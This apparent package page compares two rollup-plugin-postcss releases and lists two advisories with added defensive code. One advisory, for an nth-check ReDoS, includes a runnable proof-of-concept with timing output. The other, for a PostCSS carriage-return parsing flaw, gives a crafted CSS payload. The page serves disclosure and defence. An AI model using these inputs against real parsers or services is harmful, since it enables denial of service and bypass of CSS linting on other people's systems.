Rollup-plugin-postcss is a valuable tool for developers seeking seamless integration between Rollup and PostCSS. Comparing version 3.1.4 with the previous stable version 3.1.3, we observe small changes that can affect a developer's workflow. Both versions share core dependencies such as chalk, cssnano, postcss, and rollup-pluginutils, ensuring consistent functionality for common PostCSS transformations. The development dependencies also remain largely the same, suggesting a focus on maintaining the existing testing and build processes.
However, a key difference lies in the package distribution. Version 3.1.4 ships with fileCount: 5 and an unpackedSize of 39920 bytes, while version 3.1.3 had fileCount: 4 and an unpackedSize of 38689 bytes. These differences, though small, suggest the addition of a new file or modifications to existing ones, potentially for bug fixes, performance improvements, or feature enhancements. For developers, this means potentially improved stability or new capabilities, which warrants a closer look at the changelog. Furthermore, version 3.1.4 was released on "2020-08-05T11:51:52.329Z", in contrast to the "2020-07-14T17:54:32.208Z" release date of version 3.1.3, giving a sense of how recent the improvements are. Users should investigate the changes between these versions to determine whether the updates address specific needs or resolve issues they have encountered.
All vulnerabilities related to version 3.1.4 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")

// Grow the input by 10000 spaces per iteration and time how long the
// vulnerable regex takes to reject it; the cost grows super-linearly.
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // "2n" followed by a long run of whitespace and a character that
    // forces the match to fail, so the overlapping \s* groups backtrack.
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str)
    }
    catch (err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
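The root cause above is a backtracking regex with overlapping quantified groups, so the defensive fix is to parse An+B expressions without a regex at all. The following is an added example, not nth-check's own code: a single-pass scanner that accepts the An+B grammar (odd, even, a plain integer, or [+-]?[digits]n with an optional signed offset) and returns [a, b] in the same shape nth-check's parse uses, or null for invalid input. MAX_NTH_LENGTH is an assumed cap; genuine An+B expressions are a handful of characters, so anything longer is rejected before scanning.

```javascript
// Linear-time parser for CSS An+B expressions (added example, not from nth-check).
// No regex is used, so the cost is bounded by input length with no backtracking.
const MAX_NTH_LENGTH = 64; // assumed limit for this example; real An+B inputs are short

function parseNth(input) {
  if (typeof input !== "string" || input.length > MAX_NTH_LENGTH) return null;
  const s = input.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];

  const n = s.length;
  let i = 0;
  const isWs = (c) => c === " " || c === "\t" || c === "\n" || c === "\r" || c === "\f";
  const isDigit = (c) => c >= "0" && c <= "9";
  const skipWs = () => { while (i < n && isWs(s[i])) i++; };
  // Returns the run of digits at the cursor, or null if there is none.
  const readDigits = () => {
    const start = i;
    while (i < n && isDigit(s[i])) i++;
    return i > start ? s.slice(start, i) : null;
  };
  // Returns "+" or "-" if present at the cursor, otherwise "".
  const readSign = () => (i < n && (s[i] === "+" || s[i] === "-") ? s[i++] : "");

  const signA = readSign();
  const digitsA = readDigits();

  if (i < n && s[i] === "n") {
    i++;
    // "n" and "-n" mean a = 1 and a = -1; otherwise use the digits read.
    const a = digitsA === null ? (signA === "-" ? -1 : 1) : Number(signA + digitsA);
    skipWs();
    if (i === n) return [a, 0];
    const signB = readSign();
    if (signB === "") return null; // the B part must carry an explicit sign
    skipWs();
    const digitsB = readDigits();
    if (digitsB === null || i !== n) return null; // trailing junk is rejected
    return [a, Number(signB + digitsB)];
  }

  // No "n": a bare integer means a = 0, b = integer.
  if (digitsA === null || i !== n) return null;
  return [0, Number(signA + digitsA)];
}

// Constructed inputs, including the shape of the page's attack string.
const SAMPLES = ["2n+1", "-n + 3", "odd", "7", "2n" + " ".repeat(50000) + "!", "2n   !"];
for (const sample of SAMPLES) {
  const label = sample.length > 20 ? sample.slice(0, 5) + "...(" + sample.length + " chars)" : sample;
  console.log(JSON.stringify(label), "->", JSON.stringify(parseNth(sample)));
}

module.exports = { parseNth, MAX_NTH_LENGTH };
```

Because the scanner advances the cursor on every step and never retries, the long-whitespace inputs from the PoC fail in constant time at the length check, and even inputs under the cap are rejected in one pass once the expected sign is missing.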
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
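The discrepancy hinges on a bare carriage return being read differently by different consumers of the same CSS. CSS Syntax Level 3 defines a preprocessing step for exactly this: before tokenizing, CRLF, lone CR and FF are replaced by LF, and NUL by U+FFFD. The following is an added example, not PostCSS's own code, that applies that step to untrusted CSS before it reaches any parser and also reports where bare CRs occur, so a linter pipeline can flag input that would otherwise be interpreted inconsistently. The sample input is the page's own @font-face rule, constructed here with a literal \r.

```javascript
// Added defensive example (not PostCSS code): normalise line endings per
// CSS Syntax Level 3 "preprocessing the input stream" before parsing.
function preprocessCss(css) {
  // CRLF first so a pair collapses to one LF; then lone CR and FF; then NUL.
  return css.replace(/\r\n|\r|\f/g, "\n").replace(/\0/g, "\uFFFD");
}

// Detection helper: positions of carriage returns that are not part of a
// CRLF pair, the character at the centre of the discrepancy described above.
function findBareCarriageReturns(css) {
  const positions = [];
  for (let i = 0; i < css.length; i++) {
    if (css[i] === "\r" && css[i + 1] !== "\n") positions.push(i);
  }
  return positions;
}

// Gate for a linter that consumes external CSS: reject input that still
// carries bare CRs, or normalise it first so every consumer sees the same bytes.
function prepareUntrustedCss(css, { reject = false } = {}) {
  const bare = findBareCarriageReturns(css);
  if (reject && bare.length > 0) {
    throw new Error("bare CR at offsets " + bare.join(", ") + "; refusing to parse");
  }
  return preprocessCss(css);
}

// Constructed sample: the rule from the advisory text, with a real CR byte.
const SAMPLE = "@font-face{ font:(\r/*);}";

console.log("bare CR offsets:", findBareCarriageReturns(SAMPLE));
console.log("normalised:", JSON.stringify(prepareUntrustedCss(SAMPLE)));

module.exports = { preprocessCss, findBareCarriageReturns, prepareUntrustedCss, SAMPLE };
```

Running the normalisation step ahead of PostCSS does not replace upgrading to 8.4.31 or later, but it removes the input condition the advisory describes: once every CR has become LF, a tokenizer that only recognises LF as a line break and one that recognises both produce the same token stream.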